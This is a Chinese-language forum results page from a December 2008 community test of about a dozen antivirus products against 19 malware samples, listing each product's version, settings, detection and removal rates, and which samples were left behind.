實際檔案數:19 移除檔案數:13 剩餘檔案數:6 未偵測到:6 偵測到但未移除:0 偵測率:13/19 = 68.4% 移除率:13/19 = 68.4% 剩餘檔案: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] 偵測到但未移除檔案: 無 偵測到但只能隔離的檔案: 無 測試人員:haol 回到第一頁 Symantec Endpoint Security 防毒軟體版本:11.0.3001.2224 病毒碼日期:2008/12/25 r24 啟發式設定:高啟發 測試環境:Windows XP SP3 x86 (Virtual PC) 其他:無 防毒軟體顯示:15/38 實際檔案數:19 移除檔案數:15 剩餘檔案數:4 未偵測到:4 偵測到但未移除:0 偵測率:15/19 = 78.9% 移除率:15/19 = 78.9% 剩餘檔案: [email protected] [email protected] [email protected] [email protected] 偵測到但未移除檔案: 無 偵測到但只能隔離的檔案: 無 測試人員:imdino 回到第一頁 McAfee VirusScan Plus 防毒軟體版本:5300.2777 病毒碼日期:2008/12/25(DAT:5475) 測試環境:Windows XP SP3 x86 其他: 手動掃描設定 : 偵測即刪除 防毒軟體顯示:15/19 實際檔案數:19 移除檔案數:6 剩餘檔案數:13 未偵測到:4 偵測到但未移除:9 偵測率:15/19 = 78.9% 移除率:6/19 = 31.6% 剩餘檔案: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] 偵測到但未移除檔案: 略 偵測到但只能隔離的檔案: 略 測試人員:integear 回到第一頁 TrendMicro OfficeScan 防毒軟體版本: 8.0 病毒碼日期:2008/12/25 5.731.00 啟發式設定: 無 防毒軟體顯示:19 實際檔案數:19 移除檔案數:19 剩餘檔案數:0 未偵測到:0 偵測到但未移除:0 偵測率:19/19 = 100% 移除率:19/19 = 100% 剩餘檔案: 無 偵測到但未移除檔案 無 測試人員: kennyg 回到第一頁 TrendMicro Internet Securit 防毒軟體版本: 17.0.1438 病毒碼日期:2008/12/25 5.732.60 啟發式設定: 無 防毒軟體顯示:19 實際檔案數:19 移除檔案數:19 剩餘檔案數:0 未偵測到:0 偵測到但未移除:0 偵測率:19/19 = 100% 移除率:19/19 = 100% 剩餘檔案: 無 偵測到但未移除檔案 無 測試人員: kennyg 回到第一頁 Kaspersky Anti-Virus 防毒軟體版本:7.0.1.325 病毒碼日期:27/12/2008 啟發式設定:預設啟發 測試環境:Windows Vista Basic SP1 x86 其他:威脅軟體類別全選 防毒軟體顯示:19/79 實際檔案數:19 移除檔案數:13 剩餘檔案數:6 未偵測到:0 偵測到但未移除:6 偵測率:19/19 = 100% 移除率:13/19 = 68.4% 剩餘檔案: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] 偵測到但未移除檔案: [email protected] [email protected] [email protected] [email protected] [email protected] [email protected] 測試人員:kitman231 回到第一頁 江民防毒 KV2008 掃描引擎版本: 11.00.800 病毒碼日期:2008/12/25 啟發式設定: 無 防毒軟體顯示:忘了看 實際檔案數:19 移除檔案數:19 剩餘檔案數:0 未偵測到:0 偵測到但未移除:0 偵測率:19/19 = 100% 移除率:19/19 = 100% 剩餘檔案: 無 偵測到但未移除檔案 無 測試人員: PHT 回到第一頁 Panda Internet Security 防毒軟體版本:2009 14.00.00 病毒碼日期:2008/12/26 啟發式設定:高啟發 測試環境:Windows Vista Ultimate SP1 x86 其他:手動掃描設定 : 偵測即刪除 防毒軟體顯示:18/19 實際檔案數:19(壓縮檔內物件) 移除檔案數:16(壓縮檔內物件) 剩餘檔案數:3(壓縮檔內物件) 啟發檔案數:1 未偵測到:0(壓縮檔內物件) 偵測到但未移除:3 偵測率:19/19 = 100% 移除率:16/19 = 84% 剩餘檔案: Trojan2008.12.24@007 Trojan2008.12.24@009 Worm2008.12.24@002 偵測到但未移除檔案: Trojan2008.12.24@007 Trojan2008.12.24@009 Worm2008.12.24@002 偵測到但只能隔離的檔案: 無 測試人員:Shisin 回到第一頁 ESET NOD32 Antivirus 防毒軟體版本:3.0.669.0 病毒碼版本:3718 病毒碼日期:2008/12/26 啟發式設定:進階 測試環境:Windows XP Professional SP3 x86 (VMware) 其他:手動掃描 預設設定值 偵測即刪除 防毒軟體顯示:18/43 實際檔案數:19 移除檔案數:18 剩餘檔案數:1 未偵測到:1 偵測到但未移除:0 偵測率:18/19 = 94.7% 移除率:18/19 = 94.7% 剩餘檔案: [email protected] 偵測到但未移除檔案: 無 偵測到但只能隔離的檔案: 無 測試人員:小狄~ 回到第一頁 Norton Internet Security 防毒軟體版本:2009 16.2.0.7 病毒碼日期:2008/12/28 測試環境:Windows 7 6956 其他: 防毒軟體顯示:39/15 實際檔案數:19 移除檔案數:15 剩餘檔案數:4 未偵測到:4 偵測到但未移除:4 偵測率:15/19 = 79% 移除率:15/19 = 79% 剩餘檔案:(請重新啟動完成.再看) Trojan2008.12.24@003 Trojan2008.12.24@009 Worm2008.12.24@001 Worm2008.12.24@002 偵測到但未移除檔案(請重新啟動完成.再看) 無 偵測到但只能隔離的檔案: 無 測試人員:ss30102 回到第一頁 PC Tools Internet Security 防毒軟體版本:2009 6.0.0.386 病毒碼日期:2008/12/28 測試環境:Windows XP 其他: 防毒軟體顯示:19/14 實際檔案數:19 移除檔案數:14 剩餘檔案數:5 未偵測到:5 偵測到但未移除:5 偵測率:14/19 = 74% 移除率:14/19 = 74% 剩餘檔案:(請重新啟動完成.再看) [email protected] [email protected] [email protected] [email protected] [email protected] 偵測到但未移除檔案(請重新啟動完成.再看) 無 偵測到但只能隔離的檔案: 無 測試人員:ss30102 回到第一頁 VBA32 Workerstation 防毒軟體版本: 3.12.8.10 病毒碼版本: 2008/12/21 08:09 啟發式設定: Excessive 測試環境: Windows XP SP2 in VMWare 其他: Thorough scanning mode Detect Spyware, Adware, Riskware Detect installers of malware Mail scanning 防毒軟體顯示: N/A 實際檔案數: 19 移除檔案數: 17 (16 個已知威脅 + 0 個已知廣告軟體 + 1 個未知威脅) 剩餘檔案數: 2 未偵測到: 2 偵測到但未移除: 0 偵測率: 17/19 = 89.47% 移除率: 17/19 = 89.47% 剩餘檔案: [email protected] [email protected] 偵測到但未移除檔案: N/A 測試人員: 000110 回到第一頁 VBA32 Workerstation 防毒軟體版本: 3.12.8.10 病毒碼版本: 2008/12/21 08:09 啟發式設定: 預設設定 測試環境: Windows XP SP2 in VMWare 其他: 右鍵掃瞄 (即預設設定) 防毒軟體顯示: N/A 實際檔案數: 19 移除檔案數: 15 剩餘檔案數: 4 未偵測到: 4 偵測到但未移除: 偵測率: 15/19 = 78.95% 移除率: 15/19 = 78.95% 剩餘檔案: [email protected] [email protected] [email protected] [email protected] 偵測到但未移除檔案: N/A 測試人員: 000110 回到第一頁 avast! Antivirus 防毒軟體版本︰4.8.1296 病毒碼日期︰2008/12/28 測試環境︰Windows Vista Home Basic x86 (實機) 防毒軟體顯示:60/23 實際檔案數:19 移除檔案數:18 剩餘檔案數:1 未偵測到:1 偵測到但未移除:0 偵測率:18/19 = 95% 移除率:18/18 = 100% 剩餘檔案︰ [email protected] 測試人員︰戴計 Tai Kai 回到第一頁